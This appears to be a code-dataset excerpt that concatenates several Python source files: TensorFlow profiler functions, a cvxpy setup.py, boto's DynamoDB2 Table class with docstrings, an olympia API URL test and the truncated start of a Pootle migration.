graph: tf.Graph. If None and eager execution is not enabled, use
default graph.
run_meta: optional tensorflow.RunMetadata proto. It is necessary to
to support run time information profiling, such as time and memory.
op_log: tensorflow.tfprof.OpLogProto proto. User can assign "types" to
graph nodes with op_log. "types" allow user to flexibly group and
account profiles using options['accounted_type_regexes'].
cmd: string. Either 'op', 'scope', 'graph' or 'code'.
'op' view organizes profile using operation type. (e.g. MatMul)
'scope' view organizes profile using graph node name scope.
'graph' view organizes profile using graph node inputs/outputs.
'code' view organizes profile using Python call stack.
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
If cmd is 'scope' or 'graph', returns GraphNodeProto proto.
If cmd is 'op' or 'code', returns MultiGraphNodeProto proto.
Side effect: stdout/file/timeline.json depending on options['output']
"""
if not graph and context.in_graph_mode():
graph = ops.get_default_graph()
if options == _DEFAULT_PROFILE_OPTIONS:
options = (option_builder.ProfileOptionBuilder
.trainable_variables_parameter())
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
graph, op_log, run_meta, add_trace=cmd == 'code')
# pylint: enable=protected-access
opts = _build_options(options)
run_meta_str = run_meta.SerializeToString() if run_meta else b''
graph_str = _graph_string(graph)
if cmd == 'code' or cmd == 'op':
tfprof_node = tfprof_output_pb2.MultiGraphNodeProto()
ret = print_mdl.PrintModelAnalysis(graph_str, run_meta_str,
op_log.SerializeToString(),
cmd.encode('utf-8'),
opts.SerializeToString())
try:
tfprof_node.ParseFromString(ret)
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
elif cmd == 'graph' or cmd == 'scope':
tfprof_node = tfprof_output_pb2.GraphNodeProto()
ret = print_mdl.PrintModelAnalysis(graph_str, run_meta_str,
op_log.SerializeToString(),
cmd.encode('utf-8'),
opts.SerializeToString())
try:
tfprof_node.ParseFromString(ret)
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
else:
raise errors.InvalidArgumentError(
None, None, 'unknown cmd: %s\n' % cmd)
return tfprof_node
@tf_export('profiler.advise')
def advise(graph=None, run_meta=None, options=_DEFAULT_ADVISE_OPTIONS):
"""Auto profile and advise.
Builds profiles and automatically check anomalies of various
aspects. For more details:
https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/README.md
Args:
graph: tf.Graph. If None and eager execution is not enabled, use
default graph.
run_meta: optional tensorflow.RunMetadata proto. It is necessary to
to support run time information profiling, such as time and memory.
options: see ALL_ADVICE example above. Default checks everything.
Returns:
Returns AdviceProto proto
"""
if not graph and context.in_eager_execution():
graph = ops.get_default_graph()
if options == _DEFAULT_ADVISE_OPTIONS:
options = ALL_ADVICE.copy()
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
graph, None, run_meta, add_trace=True)
# pylint: enable=protected-access
run_meta_str = run_meta.SerializeToString() if run_meta else b''
opts = _build_advisor_options(options)
ret = tfprof_output_pb2.AdviceProto()
ret.ParseFromString(
print_mdl.PrintModelAnalysis(
_graph_string(graph), run_meta_str, op_log.SerializeToString(),
'advise'.encode('utf-8'), opts.SerializeToString()))
return ret
| apache-2.0 | 239,228,117,130,773,600 | 34.714286 | 91 | 0.665733 | false |
jpmpentwater/cvxpy | setup.py | 1 | 1350 | from setuptools import setup
setup(
name='cvxpy',
version='0.2.28',
author='Steven Diamond, Eric Chu, Stephen Boyd',
author_email='[email protected], [email protected], [email protected]',
packages=['cvxpy',
'cvxpy.atoms',
'cvxpy.atoms.affine',
'cvxpy.atoms.elementwise',
'cvxpy.constraints',
'cvxpy.expressions',
'cvxpy.expressions.constants',
'cvxpy.expressions.variables',
'cvxpy.interface',
'cvxpy.interface.numpy_interface',
'cvxpy.interface.cvxopt_interface',
'cvxpy.lin_ops',
'cvxpy.problems',
'cvxpy.problems.problem_data',
'cvxpy.problems.solvers',
'cvxpy.tests',
'cvxpy.transforms',
'cvxpy.utilities'],
package_dir={'cvxpy': 'cvxpy'},
url='http://github.com/cvxgrp/cvxpy/',
license='GPLv3',
zip_safe=False,
description='A domain-specific language for modeling convex optimization problems in Python.',
install_requires=["cvxopt >= 1.1.6",
"ecos >= 2.0.4",
"scs >= 1.1.3",
"toolz",
"numpy >= 1.8",
"scipy >= 0.13"],
use_2to3=True,
)
| gpl-3.0 | 845,811,221,487,602,400 | 34.526316 | 98 | 0.50963 | false |
lochiiconnectivity/boto | boto/dynamodb2/table.py | 2 | 38302 | from boto.dynamodb2 import exceptions
from boto.dynamodb2.fields import (HashKey, RangeKey,
AllIndex, KeysOnlyIndex, IncludeIndex)
from boto.dynamodb2.items import Item
from boto.dynamodb2.layer1 import DynamoDBConnection
from boto.dynamodb2.results import ResultSet, BatchGetResultSet
from boto.dynamodb2.types import Dynamizer, FILTER_OPERATORS, QUERY_OPERATORS
class Table(object):
"""
Interacts & models the behavior of a DynamoDB table.
The ``Table`` object represents a set (or rough categorization) of
records within DynamoDB. The important part is that all records within the
table, while largely-schema-free, share the same schema & are essentially
namespaced for use in your application. For example, you might have a
``users`` table or a ``forums`` table.
"""
max_batch_get = 100
def __init__(self, table_name, schema=None, throughput=None, indexes=None,
connection=None):
"""
Sets up a new in-memory ``Table``.
This is useful if the table already exists within DynamoDB & you simply
want to use it for additional interactions. The only required parameter
is the ``table_name``. However, under the hood, the object will call
``describe_table`` to determine the schema/indexes/throughput. You
can avoid this extra call by passing in ``schema`` & ``indexes``.
**IMPORTANT** - If you're creating a new ``Table`` for the first time,
you should use the ``Table.create`` method instead, as it will
persist the table structure to DynamoDB.
Requires a ``table_name`` parameter, which should be a simple string
of the name of the table.
Optionally accepts a ``schema`` parameter, which should be a list of
``BaseSchemaField`` subclasses representing the desired schema.
Optionally accepts a ``throughput`` parameter, which should be a
dictionary. If provided, it should specify a ``read`` & ``write`` key,
both of which should have an integer value associated with them.
Optionally accepts a ``indexes`` parameter, which should be a list of
``BaseIndexField`` subclasses representing the desired indexes.
Optionally accepts a ``connection`` parameter, which should be a
``DynamoDBConnection`` instance (or subclass). This is primarily useful
for specifying alternate connection parameters.
Example::
# The simple, it-already-exists case.
>>> conn = Table('users')
# The full, minimum-extra-calls case.
>>> from boto.dynamodb2.layer1 import DynamoDBConnection
>>> users = Table('users', schema=[
... HashKey('username'),
... RangeKey('date_joined', data_type=NUMBER)
... ], throughput={
... 'read':20,
... 'write': 10,
... }, indexes=[
... KeysOnlyIndex('MostRecentlyJoined', parts=[
... RangeKey('date_joined')
... ]),
... ],
... connection=DynamoDBConnection(
... aws_access_key_id='key',
... aws_secret_access_key='key',
... region='us-west-2'
... ))
"""
self.table_name = table_name
self.connection = connection
self.throughput = {
'read': 5,
'write': 5,
}
self.schema = schema
self.indexes = indexes
if self.connection is None:
self.connection = DynamoDBConnection()
if throughput is not None:
self.throughput = throughput
self._dynamizer = Dynamizer()
@classmethod
def create(cls, table_name, schema, throughput=None, indexes=None,
connection=None):
"""
Creates a new table in DynamoDB & returns an in-memory ``Table`` object.
This will setup a brand new table within DynamoDB. The ``table_name``
must be unique for your AWS account. The ``schema`` is also required
to define the key structure of the table.
**IMPORTANT** - You should consider the usage pattern of your table
up-front, as the schema & indexes can **NOT** be modified once the
table is created, requiring the creation of a new table & migrating
the data should you wish to revise it.
**IMPORTANT** - If the table already exists in DynamoDB, additional
calls to this method will result in an error. If you just need
a ``Table`` object to interact with the existing table, you should
just initialize a new ``Table`` object, which requires only the
``table_name``.
Requires a ``table_name`` parameter, which should be a simple string
of the name of the table.
Requires a ``schema`` parameter, which should be a list of
``BaseSchemaField`` subclasses representing the desired schema.
Optionally accepts a ``throughput`` parameter, which should be a
dictionary. If provided, it should specify a ``read`` & ``write`` key,
both of which should have an integer value associated with them.
Optionally accepts a ``indexes`` parameter, which should be a list of
``BaseIndexField`` subclasses representing the desired indexes.
Optionally accepts a ``connection`` parameter, which should be a
``DynamoDBConnection`` instance (or subclass). This is primarily useful
for specifying alternate connection parameters.
Example::
>>> users = Table.create_table('users', schema=[
... HashKey('username'),
... RangeKey('date_joined', data_type=NUMBER)
... ], throughput={
... 'read':20,
... 'write': 10,
... }, indexes=[
... KeysOnlyIndex('MostRecentlyJoined', parts=[
... RangeKey('date_joined')
... ]),
... ])
"""
table = cls(table_name=table_name, connection=connection)
table.schema = schema
if throughput is not None:
table.throughput = throughput
if indexes is not None:
table.indexes = indexes
# Prep the schema.
raw_schema = []
attr_defs = []
for field in table.schema:
raw_schema.append(field.schema())
# Build the attributes off what we know.
attr_defs.append(field.definition())
raw_throughput = {
'ReadCapacityUnits': int(table.throughput['read']),
'WriteCapacityUnits': int(table.throughput['write']),
}
kwargs = {}
if table.indexes:
# Prep the LSIs.
raw_lsi = []
for index_field in table.indexes:
raw_lsi.append(index_field.schema())
# Again, build the attributes off what we know.
# HOWEVER, only add attributes *NOT* already seen.
attr_define = index_field.definition()
for part in attr_define:
attr_names = [attr['AttributeName'] for attr in attr_defs]
if not part['AttributeName'] in attr_names:
attr_defs.append(part)
kwargs['local_secondary_indexes'] = raw_lsi
table.connection.create_table(
table_name=table.table_name,
attribute_definitions=attr_defs,
key_schema=raw_schema,
provisioned_throughput=raw_throughput,
**kwargs
)
return table
def _introspect_schema(self, raw_schema):
"""
Given a raw schema structure back from a DynamoDB response, parse
out & build the high-level Python objects that represent them.
"""
schema = []
for field in raw_schema:
if field['KeyType'] == 'HASH':
schema.append(HashKey(field['AttributeName']))
elif field['KeyType'] == 'RANGE':
schema.append(RangeKey(field['AttributeName']))
else:
raise exceptions.UnknownSchemaFieldError(
"%s was seen, but is unknown. Please report this at "
"https://github.com/boto/boto/issues." % field['KeyType']
)
return schema
def _introspect_indexes(self, raw_indexes):
"""
Given a raw index structure back from a DynamoDB response, parse
out & build the high-level Python objects that represent them.
"""
indexes = []
for field in raw_indexes:
index_klass = AllIndex
kwargs = {
'parts': []
}
if field['Projection']['ProjectionType'] == 'ALL':
index_klass = AllIndex
elif field['Projection']['ProjectionType'] == 'KEYS_ONLY':
index_klass = KeysOnlyIndex
elif field['Projection']['ProjectionType'] == 'INCLUDE':
index_klass = IncludeIndex
kwargs['includes'] = field['Projection']['NonKeyAttributes']
else:
raise exceptions.UnknownIndexFieldError(
"%s was seen, but is unknown. Please report this at "
"https://github.com/boto/boto/issues." % \
field['Projection']['ProjectionType']
)
name = field['IndexName']
kwargs['parts'] = self._introspect_schema(field['KeySchema'])
indexes.append(index_klass(name, **kwargs))
return indexes
def describe(self):
"""
Describes the current structure of the table in DynamoDB.
This information will be used to update the ``schema``, ``indexes``
and ``throughput`` information on the ``Table``. Some calls, such as
those involving creating keys or querying, will require this
information to be populated.
It also returns the full raw datastructure from DynamoDB, in the
event you'd like to parse out additional information (such as the
``ItemCount`` or usage information).
Example::
>>> users.describe()
{
# Lots of keys here...
}
>>> len(users.schema)
2
"""
result = self.connection.describe_table(self.table_name)
# Blindly update throughput, since what's on DynamoDB's end is likely
# more correct.
raw_throughput = result['Table']['ProvisionedThroughput']
self.throughput['read'] = int(raw_throughput['ReadCapacityUnits'])
self.throughput['write'] = int(raw_throughput['WriteCapacityUnits'])
if not self.schema:
# Since we have the data, build the schema.
raw_schema = result['Table'].get('KeySchema', [])
self.schema = self._introspect_schema(raw_schema)
if not self.indexes:
# Build the index information as well.
raw_indexes = result['Table'].get('LocalSecondaryIndexes', [])
self.indexes = self._introspect_indexes(raw_indexes)
# This is leaky.
return result
def update(self, throughput):
"""
Updates table attributes in DynamoDB.
Currently, the only thing you can modify about a table after it has
been created is the throughput.
Requires a ``throughput`` parameter, which should be a
dictionary. If provided, it should specify a ``read`` & ``write`` key,
both of which should have an integer value associated with them.
Returns ``True`` on success.
Example::
# For a read-heavier application...
>>> users.update(throughput={
... 'read': 20,
... 'write': 10,
... })
True
"""
self.throughput = throughput
self.connection.update_table(self.table_name, {
'ReadCapacityUnits': int(self.throughput['read']),
'WriteCapacityUnits': int(self.throughput['write']),
})
return True
def delete(self):
"""
Deletes a table in DynamoDB.
**IMPORTANT** - Be careful when using this method, there is no undo.
Returns ``True`` on success.
Example::
>>> users.delete()
True
"""
self.connection.delete_table(self.table_name)
return True
def _encode_keys(self, keys):
"""
Given a flat Python dictionary of keys/values, converts it into the
nested dictionary DynamoDB expects.
Converts::
{
'username': 'john',
'tags': [1, 2, 5],
}
...to...::
{
'username': {'S': 'john'},
'tags': {'NS': ['1', '2', '5']},
}
"""
raw_key = {}
for key, value in keys.items():
raw_key[key] = self._dynamizer.encode(value)
return raw_key
def get_item(self, consistent=False, **kwargs):
"""
Fetches an item (record) from a table in DynamoDB.
To specify the key of the item you'd like to get, you can specify the
key attributes as kwargs.
Optionally accepts a ``consistent`` parameter, which should be a
boolean. If you provide ``True``, it will perform
a consistent (but more expensive) read from DynamoDB.
(Default: ``False``)
Returns an ``Item`` instance containing all the data for that record.
Example::
# A simple hash key.
>>> john = users.get_item(username='johndoe')
>>> john['first_name']
'John'
# A complex hash+range key.
>>> john = users.get_item(username='johndoe', last_name='Doe')
>>> john['first_name']
'John'
# A consistent read (assuming the data might have just changed).
>>> john = users.get_item(username='johndoe', consistent=True)
>>> john['first_name']
'Johann'
# With a key that is an invalid variable name in Python.
# Also, assumes a different schema than previous examples.
>>> john = users.get_item(**{
... 'date-joined': 127549192,
... })
>>> john['first_name']
'John'
"""
raw_key = self._encode_keys(kwargs)
item_data = self.connection.get_item(
self.table_name,
raw_key,
consistent_read=consistent
)
item = Item(self)
item.load(item_data)
return item
def put_item(self, data, overwrite=False):
"""
Saves an entire item to DynamoDB.
By default, if any part of the ``Item``'s original data doesn't match
what's currently in DynamoDB, this request will fail. This prevents
other processes from updating the data in between when you read the
item & when your request to update the item's data is processed, which
would typically result in some data loss.
Requires a ``data`` parameter, which should be a dictionary of the data
you'd like to store in DynamoDB.
Optionally accepts an ``overwrite`` parameter, which should be a
boolean. If you provide ``True``, this will tell DynamoDB to blindly
overwrite whatever data is present, if any.
Returns ``True`` on success.
Example::
>>> users.put_item(data={
... 'username': 'jane',
... 'first_name': 'Jane',
... 'last_name': 'Doe',
... 'date_joined': 126478915,
... })
True
"""
item = Item(self, data=data)
return item.save(overwrite=overwrite)
def _put_item(self, item_data, expects=None):
"""
The internal variant of ``put_item`` (full data). This is used by the
``Item`` objects, since that operation is represented at the
table-level by the API, but conceptually maps better to telling an
individual ``Item`` to save itself.
"""
kwargs = {}
if expects is not None:
kwargs['expected'] = expects
self.connection.put_item(self.table_name, item_data, **kwargs)
return True
def _update_item(self, key, item_data, expects=None):
"""
The internal variant of ``put_item`` (partial data). This is used by the
``Item`` objects, since that operation is represented at the
table-level by the API, but conceptually maps better to telling an
individual ``Item`` to save itself.
"""
raw_key = self._encode_keys(key)
kwargs = {}
if expects is not None:
kwargs['expected'] = expects
self.connection.update_item(self.table_name, raw_key, item_data, **kwargs)
return True
def delete_item(self, **kwargs):
"""
Deletes an item in DynamoDB.
**IMPORTANT** - Be careful when using this method, there is no undo.
To specify the key of the item you'd like to get, you can specify the
key attributes as kwargs.
Returns ``True`` on success.
Example::
# A simple hash key.
>>> users.delete_item(username='johndoe')
True
# A complex hash+range key.
>>> users.delete_item(username='jane', last_name='Doe')
True
# With a key that is an invalid variable name in Python.
# Also, assumes a different schema than previous examples.
>>> users.delete_item(**{
... 'date-joined': 127549192,
... })
True
"""
raw_key = self._encode_keys(kwargs)
self.connection.delete_item(self.table_name, raw_key)
return True
def get_key_fields(self):
"""
Returns the fields necessary to make a key for a table.
If the ``Table`` does not already have a populated ``schema``,
this will request it via a ``Table.describe`` call.
Returns a list of fieldnames (strings).
Example::
# A simple hash key.
>>> users.get_key_fields()
['username']
# A complex hash+range key.
>>> users.get_key_fields()
['username', 'last_name']
"""
if not self.schema:
# We don't know the structure of the table. Get a description to
# populate the schema.
self.describe()
return [field.name for field in self.schema]
def batch_write(self):
"""
Allows the batching of writes to DynamoDB.
Since each write/delete call to DynamoDB has a cost associated with it,
when loading lots of data, it makes sense to batch them, creating as
few calls as possible.
This returns a context manager that will transparently handle creating
these batches. The object you get back lightly-resembles a ``Table``
object, sharing just the ``put_item`` & ``delete_item`` methods
(which are all that DynamoDB can batch in terms of writing data).
DynamoDB's maximum batch size is 25 items per request. If you attempt
to put/delete more than that, the context manager will batch as many
as it can up to that number, then flush them to DynamoDB & continue
batching as more calls come in.
Example::
# Assuming a table with one record...
>>> with users.batch_write() as batch:
... batch.put_item(data={
... 'username': 'johndoe',
... 'first_name': 'John',
... 'last_name': 'Doe',
... 'owner': 1,
... })
... # Nothing across the wire yet.
... batch.delete_item(username='bob')
... # Still no requests sent.
... batch.put_item(data={
... 'username': 'jane',
... 'first_name': 'Jane',
... 'last_name': 'Doe',
... 'date_joined': 127436192,
... })
... # Nothing yet, but once we leave the context, the
... # put/deletes will be sent.
"""
# PHENOMENAL COSMIC DOCS!!! itty-bitty code.
return BatchTable(self)
def _build_filters(self, filter_kwargs, using=QUERY_OPERATORS):
"""
An internal method for taking query/scan-style ``**kwargs`` & turning
them into the raw structure DynamoDB expects for filtering.
"""
filters = {}
for field_and_op, value in filter_kwargs.items():
field_bits = field_and_op.split('__')
fieldname = '__'.join(field_bits[:-1])
try:
op = using[field_bits[-1]]
except KeyError:
raise exceptions.UnknownFilterTypeError(
"Operator '%s' from '%s' is not recognized." % (
field_bits[-1],
field_and_op
)
)
lookup = {
'AttributeValueList': [],
'ComparisonOperator': op,
}
# Special-case the ``NULL/NOT_NULL`` case.
if field_bits[-1] == 'null':
del lookup['AttributeValueList']
if value is False:
lookup['ComparisonOperator'] = 'NOT_NULL'
else:
lookup['ComparisonOperator'] = 'NULL'
# Special-case the ``BETWEEN`` case.
elif field_bits[-1] == 'between':
if len(value) == 2 and isinstance(value, (list, tuple)):
lookup['AttributeValueList'].append(
self._dynamizer.encode(value[0])
)
lookup['AttributeValueList'].append(
self._dynamizer.encode(value[1])
)
else:
# Fix up the value for encoding, because it was built to only work
# with ``set``s.
if isinstance(value, (list, tuple)):
value = set(value)
lookup['AttributeValueList'].append(
self._dynamizer.encode(value)
)
# Finally, insert it into the filters.
filters[fieldname] = lookup
return filters
def query(self, limit=None, index=None, reverse=False, consistent=False,
attributes=None, **filter_kwargs):
"""
Queries for a set of matching items in a DynamoDB table.
Queries can be performed against a hash key, a hash+range key or
against any data stored in your local secondary indexes.
**Note** - You can not query against arbitrary fields within the data
stored in DynamoDB.
To specify the filters of the items you'd like to get, you can specify
the filters as kwargs. Each filter kwarg should follow the pattern
``<fieldname>__<filter_operation>=<value_to_look_for>``.
Optionally accepts a ``limit`` parameter, which should be an integer
count of the total number of items to return. (Default: ``None`` -
all results)
Optionally accepts an ``index`` parameter, which should be a string of
name of the local secondary index you want to query against.
(Default: ``None``)
Optionally accepts a ``reverse`` parameter, which will present the
results in reverse order. (Default: ``None`` - normal order)
Optionally accepts a ``consistent`` parameter, which should be a
boolean. If you provide ``True``, it will force a consistent read of
the data (more expensive). (Default: ``False`` - use eventually
consistent reads)
Optionally accepts a ``attributes`` parameter, which should be a
tuple. If you provide any attributes only these will be fetched
from DynamoDB. This uses the ``AttributesToGet`` and set's
``Select`` to ``SPECIFIC_ATTRIBUTES`` API.
Returns a ``ResultSet``, which transparently handles the pagination of
results you get back.
Example::
# Look for last names equal to "Doe".
>>> results = users.query(last_name__eq='Doe')
>>> for res in results:
... print res['first_name']
'John'
'Jane'
# Look for last names beginning with "D", in reverse order, limit 3.
>>> results = users.query(
... last_name__beginswith='D',
... reverse=True,
... limit=3
... )
>>> for res in results:
... print res['first_name']
'Alice'
'Jane'
'John'
# Use an LSI & a consistent read.
>>> results = users.query(
... date_joined__gte=1236451000,
... owner__eq=1,
... index='DateJoinedIndex',
... consistent=True
... )
>>> for res in results:
... print res['first_name']
'Alice'
'Bob'
'John'
'Fred'
"""
if self.schema:
if len(self.schema) == 1 and len(filter_kwargs) <= 1:
raise exceptions.QueryError(
"You must specify more than one key to filter on."
)
if attributes is not None:
select = 'SPECIFIC_ATTRIBUTES'
else:
select = None
results = ResultSet()
kwargs = filter_kwargs.copy()
kwargs.update({
'limit': limit,
'index': index,
'reverse': reverse,
'consistent': consistent,
'select': select,
'attributes_to_get': attributes
})
results.to_call(self._query, **kwargs)
return results
def query_count(self, index=None, consistent=False, **filter_kwargs):
"""
Queries the exact count of matching items in a DynamoDB table.
Queries can be performed against a hash key, a hash+range key or
against any data stored in your local secondary indexes.
To specify the filters of the items you'd like to get, you can specify
the filters as kwargs. Each filter kwarg should follow the pattern
``<fieldname>__<filter_operation>=<value_to_look_for>``.
Optionally accepts an ``index`` parameter, which should be a string of
name of the local secondary index you want to query against.
(Default: ``None``)
Optionally accepts a ``consistent`` parameter, which should be a
boolean. If you provide ``True``, it will force a consistent read of
the data (more expensive). (Default: ``False`` - use eventually
consistent reads)
Returns an integer which represents the exact amount of matched
items.
Example::
# Look for last names equal to "Doe".
>>> users.query_count(last_name__eq='Doe')
5
# Use an LSI & a consistent read.
>>> users.query_count(
... date_joined__gte=1236451000,
... owner__eq=1,
... index='DateJoinedIndex',
... consistent=True
... )
2
"""
key_conditions = self._build_filters(
filter_kwargs,
using=QUERY_OPERATORS
)
raw_results = self.connection.query(
self.table_name,
index_name=index,
consistent_read=consistent,
select='COUNT',
key_conditions=key_conditions,
)
return int(raw_results.get('Count', 0))
def _query(self, limit=None, index=None, reverse=False, consistent=False,
exclusive_start_key=None, select=None, attributes_to_get=None,
**filter_kwargs):
"""
The internal method that performs the actual queries. Used extensively
by ``ResultSet`` to perform each (paginated) request.
"""
kwargs = {
'limit': limit,
'index_name': index,
'scan_index_forward': reverse,
'consistent_read': consistent,
'select': select,
'attributes_to_get': attributes_to_get
}
if exclusive_start_key:
kwargs['exclusive_start_key'] = {}
for key, value in exclusive_start_key.items():
kwargs['exclusive_start_key'][key] = \
self._dynamizer.encode(value)
# Convert the filters into something we can actually use.
kwargs['key_conditions'] = self._build_filters(
filter_kwargs,
using=QUERY_OPERATORS
)
raw_results = self.connection.query(
self.table_name,
**kwargs
)
results = []
last_key = None
for raw_item in raw_results.get('Items', []):
item = Item(self)
item.load({
'Item': raw_item,
})
results.append(item)
if raw_results.get('LastEvaluatedKey', None):
last_key = {}
for key, value in raw_results['LastEvaluatedKey'].items():
last_key[key] = self._dynamizer.decode(value)
return {
'results': results,
'last_key': last_key,
}
def scan(self, limit=None, segment=None, total_segments=None,
**filter_kwargs):
"""
Scans across all items within a DynamoDB table.
Scans can be performed against a hash key or a hash+range key. You can
additionally filter the results after the table has been read but
before the response is returned.
To specify the filters of the items you'd like to get, you can specify
the filters as kwargs. Each filter kwarg should follow the pattern
``<fieldname>__<filter_operation>=<value_to_look_for>``.
Optionally accepts a ``limit`` parameter, which should be an integer
count of the total number of items to return. (Default: ``None`` -
all results)
Returns a ``ResultSet``, which transparently handles the pagination of
results you get back.
Example::
# All results.
>>> everything = users.scan()
# Look for last names beginning with "D".
>>> results = users.scan(last_name__beginswith='D')
>>> for res in results:
... print res['first_name']
'Alice'
'John'
'Jane'
# Use an ``IN`` filter & limit.
>>> results = users.scan(
... age__in=[25, 26, 27, 28, 29],
... limit=1
... )
>>> for res in results:
... print res['first_name']
'Alice'
"""
results = ResultSet()
kwargs = filter_kwargs.copy()
kwargs.update({
'limit': limit,
'segment': segment,
'total_segments': total_segments,
})
results.to_call(self._scan, **kwargs)
return results
def _scan(self, limit=None, exclusive_start_key=None, segment=None,
total_segments=None, **filter_kwargs):
"""
The internal method that performs the actual scan. Used extensively
by ``ResultSet`` to perform each (paginated) request.
"""
kwargs = {
'limit': limit,
'segment': segment,
'total_segments': total_segments,
}
if exclusive_start_key:
kwargs['exclusive_start_key'] = {}
for key, value in exclusive_start_key.items():
kwargs['exclusive_start_key'][key] = \
self._dynamizer.encode(value)
# Convert the filters into something we can actually use.
kwargs['scan_filter'] = self._build_filters(
filter_kwargs,
using=FILTER_OPERATORS
)
raw_results = self.connection.scan(
self.table_name,
**kwargs
)
results = []
last_key = None
for raw_item in raw_results.get('Items', []):
item = Item(self)
item.load({
'Item': raw_item,
})
results.append(item)
if raw_results.get('LastEvaluatedKey', None):
last_key = {}
for key, value in raw_results['LastEvaluatedKey'].items():
last_key[key] = self._dynamizer.decode(value)
return {
'results': results,
'last_key': last_key,
}
def batch_get(self, keys, consistent=False):
"""
Fetches many specific items in batch from a table.
Requires a ``keys`` parameter, which should be a list of dictionaries.
Each dictionary should consist of the keys values to specify.
Optionally accepts a ``consistent`` parameter, which should be a
boolean. If you provide ``True``, a strongly consistent read will be
used. (Default: False)
Returns a ``ResultSet``, which transparently handles the pagination of
results you get back.
Example::
>>> results = users.batch_get(keys=[
... {
... 'username': 'johndoe',
... },
... {
... 'username': 'jane',
... },
... {
... 'username': 'fred',
... },
... ])
>>> for res in results:
... print res['first_name']
'John'
'Jane'
'Fred'
"""
# We pass the keys to the constructor instead, so it can maintain it's
# own internal state as to what keys have been processed.
results = BatchGetResultSet(keys=keys, max_batch_get=self.max_batch_get)
results.to_call(self._batch_get, consistent=False)
return results
def _batch_get(self, keys, consistent=False):
"""
The internal method that performs the actual batch get. Used extensively
by ``BatchGetResultSet`` to perform each (paginated) request.
"""
items = {
self.table_name: {
'Keys': [],
},
}
if consistent:
items[self.table_name]['ConsistentRead'] = True
for key_data in keys:
raw_key = {}
for key, value in key_data.items():
raw_key[key] = self._dynamizer.encode(value)
items[self.table_name]['Keys'].append(raw_key)
raw_results = self.connection.batch_get_item(request_items=items)
results = []
unprocessed_keys = []
for raw_item in raw_results['Responses'].get(self.table_name, []):
item = Item(self)
item.load({
'Item': raw_item,
})
results.append(item)
raw_unproccessed = raw_results.get('UnprocessedKeys', {})
for raw_key in raw_unproccessed.get('Keys', []):
py_key = {}
for key, value in raw_key.items():
py_key[key] = self._dynamizer.decode(value)
unprocessed_keys.append(py_key)
return {
'results': results,
# NEVER return a ``last_key``. Just in-case any part of
# ``ResultSet`` peeks through, since much of the
# original underlying implementation is based on this key.
'last_key': None,
'unprocessed_keys': unprocessed_keys,
}
def count(self):
"""
Returns a (very) eventually consistent count of the number of items
in a table.
Lag time is about 6 hours, so don't expect a high degree of accuracy.
Example::
>>> users.count()
6
"""
info = self.describe()
return info['Table'].get('ItemCount', 0)
class BatchTable(object):
"""
Used by ``Table`` as the context manager for batch writes.
You likely don't want to try to use this object directly.
"""
def __init__(self, table):
self.table = table
self._to_put = []
self._to_delete = []
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
if not self._to_put and not self._to_delete:
return False
# Flush anything that's left.
self.flush()
return True
def put_item(self, data, overwrite=False):
self._to_put.append(data)
if self.should_flush():
self.flush()
def delete_item(self, **kwargs):
self._to_delete.append(kwargs)
if self.should_flush():
self.flush()
def should_flush(self):
if len(self._to_put) + len(self._to_delete) == 25:
return True
return False
def flush(self):
batch_data = {
self.table.table_name: [
# We'll insert data here shortly.
],
}
for put in self._to_put:
item = Item(self.table, data=put)
batch_data[self.table.table_name].append({
'PutRequest': {
'Item': item.prepare_full(),
}
})
for delete in self._to_delete:
batch_data[self.table.table_name].append({
'DeleteRequest': {
'Key': self.table._encode_keys(delete),
}
})
self.table.connection.batch_write_item(batch_data)
self._to_put = []
self._to_delete = []
return True
| mit | 326,735,140,050,743,940 | 32.925598 | 82 | 0.541564 | false |
crdoconnor/olympia | apps/api/tests/test_urls.py | 14 | 2381 | from django.contrib.auth.models import AnonymousUser
from django.test.client import RequestFactory
from mock import Mock
from nose.tools import eq_
from amo.tests import TestCase
from amo.urlresolvers import reverse
from users.models import UserProfile
from ..urls import SwitchToDRF
class TestDRFSwitch(TestCase):
fixtures = ['base/addon_3615']
def setUp(self):
super(TestDRFSwitch, self).setUp()
self.factory = RequestFactory()
self.user = UserProfile.objects.get(email='[email protected]')
def test_responses(self):
view = SwitchToDRF('Language')
request = self.factory.get(reverse('api.language', args=['1.5']))
request.APP = Mock(id=1)
request.user = AnonymousUser()
eq_(view(request, api_version=1.5).__module__, 'django.http.response')
piston_response = view(request, api_version=1.5).content
self.create_switch('drf', db=True)
eq_(view(request, api_version=1.5).__module__,
'rest_framework.response')
drf_response = view(request, api_version=1.5).render().content
eq_(piston_response, drf_response)
def test_responses_with_handler(self):
view = SwitchToDRF('User', with_handler=True)
request = self.factory.get(reverse('api.language', args=['2']))
class App():
id = 1
def __str__(self):
return str(self.id)
request.APP = App()
request.user = AnonymousUser()
request.amo_user = self.user
eq_(view(request, api_version=2).__module__, 'django.http.response')
self.create_switch('drf', db=True)
eq_(view(request, api_version=2).__module__, 'rest_framework.response')
def test_wrong_format_exceptions(self):
view = SwitchToDRF('Language')
request = self.factory.get(reverse('api.language', args=['1.5']))
request.APP = Mock(id=1)
request.GET = {'format': 'foo'}
request.user = AnonymousUser()
response = view(request, api_version=1.5)
eq_(response.content, '{"msg": "Not implemented yet."}')
eq_(response.status_code, 200)
self.create_switch('drf', db=True)
response = view(request, api_version=1.5)
self.assertTrue('<error>Not found</error>'
in response.render().content)
eq_(response.status_code, 404)
| bsd-3-clause | 6,295,353,910,578,245,000 | 35.630769 | 79 | 0.621588 | false |
translate/pootle | pootle/apps/pootle_store/migrations/0050_set_change_reviewed.py | 6 | 1710 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-21 19:06
from __future__ import unicode_literals
from django.db import migrations
from pootle.core.batch import Batch
from pootle.core.user import get_system_user_id
from pootle_statistics.models import SubmissionTypes
def _update_reviewed(qs, unit_changes):
values = qs.values_list("change", "reviewed_on", "reviewed_by")
for change, reviewed_on, reviewed_by in values.iterator():
unit_changes.filter(pk=change).update(
reviewed_on=reviewed_on,
reviewed_by=reviewed_by)
def _add_reviewed(qs, unit_changes):
values = qs.values_list("id", "reviewed_on", "reviewed_by")
def _create_method(unit, timestamp, user):
return dict(
unit_id=unit,
changed_with=(
